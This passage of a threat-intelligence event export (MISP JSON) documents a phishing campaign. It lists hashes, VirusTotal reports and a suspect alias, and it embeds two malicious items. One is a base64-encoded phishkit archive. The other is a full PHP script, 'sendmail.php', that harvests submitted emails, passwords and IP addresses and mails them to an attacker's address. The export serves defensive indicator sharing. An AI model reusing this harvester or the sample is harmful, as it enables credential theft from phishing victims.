"value": "f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a|b830fd2997e1f124f34d77ff1fa9b89e"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "mimetype",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": false,
|
||
|
"type": "mime-type",
|
||
|
"uuid": "63a26d57-f6e6-40f9-855e-8ea50014271a",
|
||
|
"value": "CDFV2 Microsoft Outlook Message"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "ssdeep",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": true,
|
||
|
"type": "ssdeep",
|
||
|
"uuid": "ff15a2f4-029c-46cd-bc7c-42f97b51b7ea",
|
||
|
"value": "12288:Yn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3F:Yn4iQUwQDkp6hdV"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "Phishkit",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1558014735",
|
||
|
"uuid": "5cdd5ff1-ed58-46d3-bed7-4bae950d210f",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd5ff1-ed58-46d3-bed7-4bae950d210f",
|
||
|
"referenced_uuid": "c3b36005-d35f-4540-bf78-cd09e2ac5e3d",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd65a9-7bf4-4105-b3b5-44f4950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd5ff1-ed58-46d3-bed7-4bae950d210f",
|
||
|
"referenced_uuid": "5cdd62fc-c898-42fb-ad4d-4aac950d210f",
|
||
|
"relationship_type": "contains",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd6a6b-f2fc-4706-b2b9-4b6b950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1558014735",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "5cdd5ff2-7094-4482-bff5-414e950d210f",
|
||
|
"value": "New-Updated-docs.zip|b7245bf657e792328aaacbc6f75d1555"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1558014735",
|
||
|
"to_ids": false,
|
||
|
"type": "filename",
|
||
|
"uuid": "5cdd5ff2-fafc-4118-96bf-4ee1950d210f",
|
||
|
"value": "New-Updated-docs.zip"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1558014735",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "5cdd5ff2-8a60-4e75-9d34-4166950d210f",
|
||
|
"value": "b7245bf657e792328aaacbc6f75d1555"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1558014735",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "5cdd5ff2-7a30-4dd6-911d-4429950d210f",
|
||
|
"value": "bc32ff3213011db8278bfcd21b1dc432ded499d3"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1558014735",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "5cdd5ff2-8570-47ba-833d-4cba950d210f",
|
||
|
"value": "9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1558014735",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "5cdd5ff2-23f4-47f6-865c-42f0950d210f",
|
||
|
"value": "3525231"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "file-encoding",
|
||
|
"timestamp": "1558014736",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cdd6b10-7f58-4ab6-918f-41c0950d210f",
|
||
|
"value": "Adobe-Standard-Encoding"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "state",
|
||
|
"timestamp": "1558014736",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cdd6b10-3178-496d-a688-4aeb950d210f",
|
||
|
"value": "Malicious"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "An object which describes a person or an identity.",
|
||
|
"meta-category": "misc",
|
||
|
"name": "person",
|
||
|
"template_uuid": "a15b0477-e9d1-4b9c-9546-abe78a4f4248",
|
||
|
"template_version": "9",
|
||
|
"timestamp": "1558014225",
|
||
|
"uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd5b25-5624-4404-b507-c170950d210f",
|
||
|
"relationship_type": "owner-of",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd61b1-6ba4-431f-ba4e-4649950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd62fc-c898-42fb-ad4d-4aac950d210f",
|
||
|
"relationship_type": "contained-within",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd6334-2694-4968-b0e7-4c59950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd63dc-ab44-4ab7-be4b-4aa1950d210f",
|
||
|
"relationship_type": "targets",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd63f3-643c-4933-8938-4ecb950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd63dc-0b30-404e-a1c4-4479950d210f",
|
||
|
"relationship_type": "targets",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd6408-6910-40e2-84fc-43bb950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd63dc-0e48-4b97-bb9e-43ff950d210f",
|
||
|
"relationship_type": "targets",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd642c-37d8-4c86-aab8-4f18950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd63dc-713c-4eb6-adf5-4f3e950d210f",
|
||
|
"relationship_type": "targets",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd644c-4954-4a77-b04c-478e950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd63dc-b678-4fae-bd00-4390950d210f",
|
||
|
"relationship_type": "targets",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd6460-2e20-481c-822c-47fc950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd63dc-29ec-42c0-936b-4d9d950d210f",
|
||
|
"relationship_type": "targets",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd647d-61a4-4cc6-b0ca-490b950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd683b-6530-4b0d-a8de-40c1950d210f",
|
||
|
"relationship_type": "abuses",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd689d-bc70-4a8c-86a0-4524950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd683b-6530-4b0d-a8de-40c1950d210f",
|
||
|
"relationship_type": "targets",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd6911-4c64-424f-b6d2-45dd950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "role",
|
||
|
"timestamp": "1558012304",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cdd6190-8d2c-4bc1-a932-4fd4950d210f",
|
||
|
"value": "Suspect"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "alias",
|
||
|
"timestamp": "1558012304",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cdd6190-d518-4fb8-8401-450c950d210f",
|
||
|
"value": "JATBOSS"
|
||
|
},
|
||
|
{
|
||
|
"category": "Person",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "gender",
|
||
|
"timestamp": "1558012304",
|
||
|
"to_ids": false,
|
||
|
"type": "gender",
|
||
|
"uuid": "5cdd6190-bea0-4a00-b93f-4488950d210f",
|
||
|
"value": "Prefer not to say"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
|
||
|
"meta-category": "misc",
|
||
|
"name": "script",
|
||
|
"template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
|
||
|
"template_version": "3",
|
||
|
"timestamp": "1558012668",
|
||
|
"uuid": "5cdd62fc-c898-42fb-ad4d-4aac950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "script",
|
||
|
"timestamp": "1558012668",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cdd62fc-4dc0-4a95-ba2b-4e21950d210f",
|
||
|
"value": "<?php\r\nif(isset($_SERVER['HTTP_X_REAL_IP'])){\r\n$ip = $_SERVER['HTTP_X_REAL_IP'];\r\n}else{\r\n$ip=$_SERVER['REMOTE_ADDR'];\r\n}\r\n$message .= \"|----------| E M A I L |--------------|\\n\";\r\n$message .= \"Online: \".$_POST['email'].\"\\n\";\r\n$message .= \"pass: \".$_POST['pwd'].\"\\n\";\r\n$message .= \"|--------------- I N F O | I P -------------------|\\n\";\r\n$message .= \"|Client IP: \".$ip.\"\\n\";\r\n$message .= \"|--- http://www.geoiptool.com/?IP=$ip ----\\n\";\r\n$message .= \"User Agent : \".$useragent.\"\\n\";\r\n$message .= \"|----------- HACKED BY JATBOSS --------------|\\n\";\r\n$send = \"jatboss6@gmail.com\";\r\n$subject = \"$country | $ip\";\r\n{\r\nmail(\"$send\", \"$subject\", $message); \r\n}\r\n\r\n\r\n?>"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "language",
|
||
|
"timestamp": "1558012668",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cdd62fc-e698-486a-b877-4563950d210f",
|
||
|
"value": "PHP"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1558012668",
|
||
|
"to_ids": true,
|
||
|
"type": "filename",
|
||
|
"uuid": "5cdd62fc-8010-4377-97b3-46ae950d210f",
|
||
|
"value": "sendmail.php"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "state",
|
||
|
"timestamp": "1558012668",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cdd62fc-0494-426e-96d5-4de9950d210f",
|
||
|
"value": "Malicious"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1558013351",
|
||
|
"uuid": "d9bdc42c-191f-49a2-8cbe-2604f5462df6",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "f1c90675-0c32-40f1-af8f-f90a06993120",
|
||
|
"value": "2019-05-16T08:54:33"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "f8eb37d5-1ef7-4e7c-b97c-7fcab9d7e00e",
|
||
|
"value": "https://www.virustotal.com/file/f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a/analysis/1557996873/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "fb7fe45e-a16c-44c4-9a4b-7b6b0018fd43",
|
||
|
"value": "1/56"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1558013351",
|
||
|
"uuid": "dcd9ca51-3194-44ee-86a2-5f0cf9b923f8",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "ac5c453a-e980-47a2-9a84-5d37cf392471",
|
||
|
"value": "2019-05-13T02:37:30"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "2b1914f7-d429-496f-b76b-dd9ea4ae34f2",
|
||
|
"value": "https://www.virustotal.com/file/56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936/analysis/1557715050/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "c092edd1-d209-4fc1-8b59-cc68ea535499",
|
||
|
"value": "0/58"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1558013351",
|
||
|
"uuid": "76f9b382-c58e-46f8-b174-42275f764d3e",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "15b0df6f-7808-4a07-a743-33883c247a54",
|
||
|
"value": "2019-05-13T02:37:43"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "15db416c-93ca-4af3-bc7e-aa8af7ad332e",
|
||
|
"value": "https://www.virustotal.com/file/28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02/analysis/1557715063/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "0c2fc5a0-15f4-432a-90c6-c3a49b54266e",
|
||
|
"value": "2/59"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1558013352",
|
||
|
"uuid": "c22ccebe-e72f-4b92-9c63-a196b4959c43",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "829ba8b8-a820-487f-9199-96b13a032e7b",
|
||
|
"value": "2019-05-15T17:45:13"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "77e038db-79c1-487f-8193-f857970cfd08",
|
||
|
"value": "https://www.virustotal.com/file/0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132/analysis/1557942313/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "17e94734-ed26-449a-b1fe-768b881c6f83",
|
||
|
"value": "1/54"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1558013352",
|
||
|
"uuid": "c3b36005-d35f-4540-bf78-cd09e2ac5e3d",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
